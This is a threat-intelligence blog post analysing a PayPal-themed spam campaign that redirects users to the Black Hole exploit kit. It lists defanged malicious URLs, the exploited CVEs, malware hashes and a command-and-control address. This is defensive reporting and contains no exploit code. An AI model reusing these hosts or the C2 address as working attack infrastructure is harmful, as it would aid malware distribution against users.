Spamvertised ‘PayPal has sent you a bank transfer’ themed emails lead to Black Hole exploit kit


By Dancho Danchev

Sticking to their well proven social engineering tactics consisting of systematic rotation of the abused brands, cybercriminals are currently spamvertising millions of emails impersonating PayPal, in an attempt to trick end and corporate users into interacting with the malicious campaign.

Once the interaction takes place, users are exposed to the client-side exploits served by the Black Hole exploit kit, currently the market share leader within the cybercrime ecosystem.

More details:

Screenshot of the spamvertised email:

Upon clicking on the link, users are exposed to bogus “Page loading…” page:

Spamvertised URLs: hxxp://earbudsforrunning.com/welcpp.htmlhxxp://vitva-musicgroup.com/wp-content/uploads/fgallery/traninfo.htmlhxxp://imune.org.br/traninfo.html

Client-side exploit serving URL: hxxp://teloexpressions.org/main.php?page=9aca5bbc34d3ebd6

Client-side exploits served: CVE-2010-0188CVE-2010-1885

Detection rate for a sample redirection script: MD5: 2276947d2f3a7abc88e89089e65dce23

Upon successful client-side exploitation, the campaign drops MD5: 05e0958ef184a27377044655d7b23cb0 on the affected hosts, detected by 28 out of 41 antivirus scanners as Trojan.Generic.KDV.679870; Trojan-Dropper.Win32.Dapato.bnej.

Upon execution the sample phones back to a well known command and control server – 87.204.199.100/mx5/B/in/ which we’ve already seen in several previously profiled malware-serving campaigns.

As we’ve already predicted, the cybercriminal or gang of cybercriminals behind these persistent and massive spam campaigns will simply continue rotating the impersonated brands in an attempt to target millions of users across multiple Web properties.

PayPal has information on their website to help users identify legitimate emails.

Webroot SecureAnywere users are proactively protected from this threat.

You can find more about Dancho Danchev at his LinkedIn Profile. You can also follow him on  Twitter.

7 thoughts on “Spamvertised ‘PayPal has sent you a bank transfer’ themed emails lead to Black Hole exploit kit

  1. Pingback: Digital Forensics, Inc. Spamvertised ‘PayPal has sent you a bank transfer’ themed emails lead to Black Hole exploit kit | Digital Forensics, Inc.

  2. Pingback: בוטוקס הזעת יתר בידיים

  3. Pingback: Cybercriminals impersonate AT&T’s Billing Service, serve exploits and malware « Webroot Threat Blog

  4. Pingback: Cybercriminals spamvertise bogus greeting cards, serve exploits and malware « Webroot Threat Blog

  5. Pingback: Cybercriminals spamvertise PayPay themed ‘Notification of payment received’ emails, serve malware « Webroot Threat Blog

  6. Pingback: PayPal ‘Notification of payment received’ themed emails serve malware « Webroot Threat Blog – Internet Security Threat Updates from Around the World

  7. Pingback: ‘PayPal Account Modified’ themed emails lead to Black Hole Exploit Kit « Webroot Threat Blog – Internet Security Threat Updates from Around the World

Join the Conversation

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s